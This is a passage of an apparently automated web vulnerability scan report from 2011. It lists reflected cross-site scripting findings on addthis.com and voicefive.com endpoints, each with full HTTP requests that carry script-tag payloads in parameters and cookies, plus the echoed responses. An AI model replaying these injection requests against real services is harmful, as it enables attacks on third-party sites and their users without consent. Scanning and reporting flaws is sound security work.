X-Pingback: http://domainnamesales.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<form method="post" action="/lcontact/?83be0\"><script>alert(1)</script>c558e1b4c87=1&#8243;>
...[SNIP]...

1.125. http://ds.addthis.com/red/psi/sites/www.kenexa.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.kenexa.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e4a2<script>alert(1)</script>83865929184 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kenexa.com/p.json?callback=_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.kenexa.com%2Frequest&ox15i8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 13:56:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 13:56:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 07 Mar 2011 13:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:56:52 GMT
Connection: close

_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.126. http://ds.addthis.com/red/psi/sites/www.metrolyrics.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.metrolyrics.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f33cb<script>alert(1)</script>4c7ee0a1303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.metrolyrics.com/p.json?callback=_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.metrolyrics.com%2F&1pj0dsq HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=6; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 00:56:16 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 00:56:16 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 07 Mar 2011 00:56:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 00:56:16 GMT
Connection: close

_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.127. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 90814<script>alert(1)</script>ea8192a8c04 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=190814<script>alert(1)</script>ea8192a8c04; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:15 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:15 2011&recExp=Mon Mar 7 01:34:15 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:15 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
c=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '190814<script>alert(1)</script>ea8192a8c04', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.co
...[SNIP]...

1.128. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 70b52<script>alert(1)</script>13042405f64 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:21 2011&recExp=Mon Mar 7 01:34:21 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
okies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun
...[SNIP]...

1.129. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 85f4c<script>alert(1)</script>c1bc6726c37 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:18 2011&recExp=Mon Mar 7 01:34:18 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30
...[SNIP]...

1.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p39750809 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p39750809 cookie is copied into the HTML document as plain text between tags. The payload 35d00<script>alert(1)</script>d41022b86e5 was submitted in the ar_p39750809 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:09 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:09 2011&recExp=Mon Mar 7 01:34:09 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:09 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
eady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "U
...[SNIP]...

1.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p58096422 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p58096422 cookie is copied into the HTML document as plain text between tags. The payload 32276<script>alert(1)</script>892a2bb3012 was submitted in the ar_p58096422 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:07 2011&recExp=Mon Mar 7 01:34:07 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%
...[SNIP]...

1.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c912d<script>alert(1)</script>bd186b7b654 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:11 2011&recExp=Mon Mar 7 01:34:11 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
Exp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload aaaa3<script>alert(1)</script>1725631997c was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:13 2011&recExp=Mon Mar 7 01:34:13 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

